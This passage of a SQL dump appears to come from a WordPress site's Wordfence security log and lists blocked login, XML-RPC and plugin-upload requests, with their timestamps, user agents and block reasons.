Chrome/37.0.2062.124 Safari/537.36','blocked:wfsnrepeat','Blocked by Wordfence Security Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),(12183,1631368666.996190,1631368666.905100,'\0\0\0\0\0\0\0\0\0\0�����',0,503,0,0,0,'https://bournesociety.org.uk/wp-login.php','https://bournesociety.org.uk','Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36','blocked:wfsnrepeat','Blocked by Wordfence Security Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),(12184,1631368666.764698,1631368666.689200,'\0\0\0\0\0\0\0\0\0\0�����',0,503,0,0,0,'https://bournesociety.org.uk/wp-login.php','https://bournesociety.org.uk','Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36','blocked:wfsnrepeat','Blocked by Wordfence Security Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),(12185,1631368666.555462,1631368666.476500,'\0\0\0\0\0\0\0\0\0\0�����',0,503,0,0,0,'https://bournesociety.org.uk/wp-login.php','https://bournesociety.org.uk','Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36','blocked:wfsnrepeat','Blocked by Wordfence Security Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),(12186,1631368666.351007,1631368666.274400,'\0\0\0\0\0\0\0\0\0\0�����',0,503,0,0,0,'https://bournesociety.org.uk/wp-login.php','https://bournesociety.org.uk','Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36','blocked:wfsnrepeat','Blocked by Wordfence Security Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),(12187,1631368666.121003,1631368666.044600,'\0\0\0\0\0\0\0\0\0\0�����',0,503,0,0,0,'https://bournesociety.org.uk/wp-login.php','https://bournesociety.org.uk','Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36','blocked:wfsnrepeat','Blocked by Wordfence Security Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),(12188,1631368665.919743,1631368665.833200,'\0\0\0\0\0\0\0\0\0\0�����',0,503,0,0,0,'https://bournesociety.org.uk/wp-login.php','https://bournesociety.org.uk','Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36','blocked:wfsnrepeat','Blocked by Wordfence Security Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),(12189,1631368665.718897,1631368665.642700,'\0\0\0\0\0\0\0\0\0\0�����',0,503,0,0,0,'https://bournesociety.org.uk/wp-login.php','https://bournesociety.org.uk','Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36','blocked:wfsnrepeat','Blocked by Wordfence Security Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),(12190,1631368665.517169,1631368665.436800,'\0\0\0\0\0\0\0\0\0\0�����',0,503,0,0,0,'https://bournesociety.org.uk/wp-login.php','https://bournesociety.org.uk','Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36','blocked:wfsnrepeat','Blocked by Wordfence Security Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),(12191,1631368665.282146,1631368665.205100,'\0\0\0\0\0\0\0\0\0\0�����',0,503,0,0,0,'https://bournesociety.org.uk/wp-login.php','https://bournesociety.org.uk','Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36','blocked:wfsnrepeat','Blocked by Wordfence Security Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),(12192,1631368665.070256,1631368664.989000,'\0\0\0\0\0\0\0\0\0\0�����',0,503,0,0,0,'https://bournesociety.org.uk/wp-login.php','https://bournesociety.org.uk','Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36','blocked:wfsnrepeat','Blocked by Wordfence Security Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),(12193,0.000000,1631368756.347435,'\0\0\0\0\0\0\0\0\0\0����r',0,200,0,0,0,'https://bournesociety.org.uk/wp-login.php','','Mozilla/5.0 (Windows NT 6.1; WOW64; rv:31.0) Gecko/20100101 Firefox/31.0','loginFailInvalidUsername',NULL,NULL),(12194,0.000000,1631369322.630541,'\0\0\0\0\0\0\0\0\0\0���a��',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(12195,0.000000,1631369329.808345,'\0\0\0\0\0\0\0\0\0\0����V',0,503,0,0,0,'https://www.bournesociety.org.uk/wp-login.php','','Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.75.14 (KHTML, like Gecko) Version/7.0.3 Safari/537.75.14','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(12196,1631369331.103823,1631369331.026000,'\0\0\0\0\0\0\0\0\0\0����V',0,503,0,0,0,'https://www.bournesociety.org.uk/wp-admin/plugin-install.php?tab=upload',NULL,'python-requests/2.26.0','blocked:wfsnrepeat','Blocked by Wordfence Security Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWFkbWluL3BsdWdpbi1pbnN0YWxsLnBocA==\"}'),(12197,0.000000,1631370006.629026,'\0\0\0\0\0\0\0\0\0\0��H�*-',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(12198,0.000000,1631370251.839773,'\0\0\0\0\0\0\0\0\0\0��\\�',0,503,0,0,0,'https://www.bournesociety.org.uk//xmlrpc.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(12199,0.000000,1631370694.628425,'\0\0\0\0\0\0\0\0\0\0��\rL��',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(12200,0.000000,1631371225.563223,'\0\0\0\0\0\0\0\0\0\0��\\�',0,503,0,0,0,'https://www.bournesociety.org.uk//xmlrpc.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(12201,0.000000,1631371391.147316,'\0\0\0\0\0\0\0\0\0\0��6%',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(12202,0.000000,1631372080.726683,'\0\0\0\0\0\0\0\0\0\0��o���',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(12203,0.000000,1631372769.403774,'\0\0\0\0\0\0\0\0\0\0��\\�',0,503,0,0,0,'https://www.bournesociety.org.uk//xmlrpc.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(12204,0.000000,1631372786.647916,'\0\0\0\0\0\0\0\0\0\0����z�',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(12205,0.000000,1631373487.043725,'\0\0\0\0\0\0\0\0\0\0���,�1',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(12206,0.000000,1631374185.101039,'\0\0\0\0\0\0\0\0\0\0��g�t�',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(12207,0.000000,1631374895.701156,'\0\0\0\0\0\0\0\0\0\0���,�1',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(12208,0.000000,1631375628.608471,'\0\0\0\0\0\0\0\0\0\0���>L�',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(12209,0.000000,1631376327.625075,'\0\0\0\0\0\0\0\0\0\0���a��',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(12210,0.000000,1631377016.730517,'\0\0\0\0\0\0\0\0\0\0��H�*-',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(12211,0.000000,1631377620.725860,'\0\0\0\0\0\0\0\0\0\0����8$',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(12212,0.000000,1631378202.393665,'\0\0\0\0\0\0\0\0\0\0��\rJ��',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(12213,0.000000,1631378733.357790,'\0\0\0\0\0\0\0\0\0\0��#�K',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(12214,0.000000,1631379231.779859,'\0\0\0\0\0\0\0\0\0\0��\rL��',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(12215,0.000000,1631379687.791416,'\0\0\0\0\0\0\0\0\0\0���\n',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(12216,0.000000,1631380187.827070,'\0\0\0\0\0\0\0\0\0\0��-wS�',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(12217,0.000000,1631380681.277159,'\0\0\0\0\0\0\0\0\0\0����B',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(12218,0.000000,1631381166.063941,'\0\0\0\0\0\0\0\0\0\0���Hݾ',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(12219,0.000000,1631381626.860534,'\0\0\0\0\0\0\0\0\0\0�����',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(12220,0.000000,1631382029.913011,'\0\0\0\0\0\0\0\0\0\0���B��',0,503,0,0,0,'https://bournesociety.org.uk/wp-login.php','','Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.99 Safari/533.4','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(12221,0.000000,1631382133.015700,'\0\0\0\0\0\0\0\0\0\0��.e_A',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(12222,0.000000,1631382515.180143,'\0\0\0\0\0\0\0\0\0\0����',0,200,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','https://www.google.com/','Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.1.3 Safari/605.1.15','loginFailInvalidUsername',NULL,NULL),(12223,0.000000,1631384053.104918,'\0\0\0\0\0\0\0\0\0\0��3',0,503,0,0,0,'https://bournesociety.org.uk/wp-login.php','','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(12224,0.000000,1631388294.761861,'\0\0\0\0\0\0\0\0\0\0��E�R',0,503,0,0,0,'https://bournesociety.org.uk/wp-login.php','','Mozilla/5.0 (iPhone; CPU iPhone OS 7_1 like Mac OS X) AppleWebKit/537.51.2 (KHTML, like Gecko) Version/7.0 Mobile/11D167 Safari/9537.53','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(12225,1631388296.087328,1631388295.973500,'\0\0\0\0\0\0\0\0\0\0��E�R',0,503,0,0,0,'https://bournesociety.org.uk/wp-admin/plugin-install.php?tab=upload',NULL,'python-requests/2.26.0','blocked:wfsnrepeat','Blocked by Wordfence Security Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWFkbWluL3BsdWdpbi1pbnN0YWxsLnBocA==\"}'),(12226,0.000000,1631388732.877029,'\0\0\0\0\0\0\0\0\0\0��-(��',0,503,0,0,0,'https://bournesociety.org.uk/wp-login.php','','Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(12227,0.000000,1631389050.840491,'\0\0\0\0\0\0\0\0\0\0����V',0,503,0,0,0,'https://www.bournesociety.org.uk/wp-login.php','','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(12228,1631389052.949330,1631389052.843300,'\0\0\0\0\0\0\0\0\0\0����V',0,503,0,0,0,'https://www.bournesociety.org.uk/wp-admin/plugin-install.php?tab=upload',NULL,'python-requests/2.26.0','blocked:wfsnrepeat','Blocked by Wordfence Security Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWFkbWluL3BsdWdpbi1pbnN0YWxsLnBocA==\"}'),(12229,0.000000,1631391154.878616,'\0\0\0\0\0\0\0\0\0\0�����',0,503,0,0,0,'https://bournesociety.org.uk/wp-login.php','','Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(12230,0.000000,1631392409.534154,'\0\0\0\0\0\0\0\0\0\0��gL)',0,503,0,0,0,'https://www.bournesociety.org.uk//xmlrpc.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(12231,1631392413.004299,1631392412.604700,'\0\0\0\0\0\0\0\0\0\0��gL)',0,503,0,0,0,'https://www.bournesociety.org.uk//wp-login.php','https://www.bournesociety.org.uk//wp-login.php','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36','blocked:wfsnrepeat','Blocked by Wordfence Security Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"Ly93cC1sb2dpbi5waHA=\"}'),(12232,0.000000,1631393102.523413,'\0\0\0\0\0\0\0\0\0\0���Y��',0,503,0,0,0,'https://bournesociety.org.uk/wp-login.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(12233,0.000000,1631395072.114361,'\0\0\0\0\0\0\0\0\0\0����E.',0,503,0,0,0,'https://bournesociety.org.uk/wp-login.php','','Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.90 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(12234,0.000000,1631397110.252301,'\0\0\0\0\0\0\0\0\0\0���E\"�',0,503,0,0,0,'https://bournesociety.org.uk/wp-login.php','','Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.80 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(12235,0.000000,1631399064.665416,'\0\0\0\0\0\0\0\0\0\0��-�M^',0,503,0,0,0,'https://bournesociety.org.uk/wp-login.php','','Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.94 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(12236,0.000000,1631400961.964302,'\0\0\0\0\0\0\0\0\0\0����n�',0,503,0,0,0,'https://bournesociety.org.uk/wp-login.php','','Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.90 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(12237,0.000000,1631401108.348377,'\0\0\0\0\0\0\0\0\0\0��\\�6q',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(12238,0.000000,1631401900.589337,'\0\0\0\0\0\0\0\0\0\0����\"',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(12239,0.000000,1631402689.628056,'\0\0\0\0\0\0\0\0\0\0��3KR',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(12240,0.000000,1631403511.007774,'\0\0\0\0\0\0\0\0\0\0��ms��',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(12241,0.000000,1631404322.119769,'\0\0\0\0\0\0\0\0\0\0����}�',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(12242,0.000000,1631404828.888287,'\0\0\0\0\0\0\0\0\0\0���\rKz',0,503,0,0,0,'https://bournesociety.org.uk/wp-login.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.101 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(12243,0.000000,1631405092.016794,'\0\0\0\0\0\0\0\0\0\0��E�R',0,503,0,0,0,'https://www.bournesociety.org.uk/wp-login.php','','Mozilla/5.0 (iPad; CPU OS 7_1_2 like Mac OS X) AppleWebKit/537.51.2 (KHTML, like Gecko) Version/7.0 Mobile/11D257 Safari/9537.53','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(12244,1631405093.862850,1631405093.781900,'\0\0\0\0\0\0\0\0\0\0��E�R',0,503,0,0,0,'https://www.bournesociety.org.uk/wp-admin/plugin-install.php?tab=upload',NULL,'python-requests/2.26.0','blocked:wfsnrepeat','Blocked by Wordfence Security Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWFkbWluL3BsdWdpbi1pbnN0YWxsLnBocA==\"}'),(12245,0.000000,1631405168.281960,'\0\0\0\0\0\0\0\0\0\0���KG�',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(12246,0.000000,1631406028.204129,'\0\0\0\0\0\0\0\0\0\0���˰R',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(12247,0.000000,1631406878.594346,'\0\0\0\0\0\0\0\0\0\0���yQ�',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(12248,0.000000,1631407722.449489,'\0\0\0\0\0\0\0\0\0\0���KG�',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(12249,0.000000,1631408608.177502,'\0\0\0\0\0\0\0\0\0\0��6\'iX',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(12250,0.000000,1631408767.219619,'\0\0\0\0\0\0\0\0\0\0���#�',0,503,0,0,0,'https://bournesociety.org.uk/wp-login.php','','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.109 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(12251,0.000000,1631409497.475406,'\0\0\0\0\0\0\0\0\0\0���Dc�',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(12252,0.000000,1631410387.340625,'\0\0\0\0\0\0\0\0\0\0��@��',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(12253,0.000000,1631410699.823931,'\0\0\0\0\0\0\0\0\0\0��=��',0,503,0,0,0,'https://bournesociety.org.uk/wp-login.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.101 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(12254,0.000000,1631411265.970791,'\0\0\0\0\0\0\0\0\0\0���Hӱ',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(12255,0.000000,1631412176.115473,'\0\0\0\0\0\0\0\0\0\0��-=��',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(12256,0.000000,1631412681.895183,'\0\0\0\0\0\0\0\0\0\0��- 9',0,503,0,0,0,'https://bournesociety.org.uk/wp-login.php','','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.101 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(12257,0.000000,1631413054.170112,'\0\0\0\0\0\0\0\0\0\0��_o�|',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(12258,0.000000,1631413941.384083,'\0\0\0\0\0\0\0\0\0\0���Q֨',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(12259,0.000000,1631414624.633413,'\0\0\0\0\0\0\0\0\0\0��h���',0,503,0,0,0,'https://bournesociety.org.uk/wp-login.php','','Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2987.133 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(12260,0.000000,1631415223.435247,'\0\0\0\0\0\0\0\0\0\0��C�= ',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(12261,0.000000,1631415680.410303,'\0\0\0\0\0\0\0\0\0\0����7',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(12262,0.000000,1631416382.140787,'\0\0\0\0\0\0\0\0\0\0��_o�|',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(12263,0.000000,1631416546.332904,'\0\0\0\0\0\0\0\0\0\0��-(��',0,503,0,0,0,'https://bournesociety.org.uk/wp-login.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.70 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security 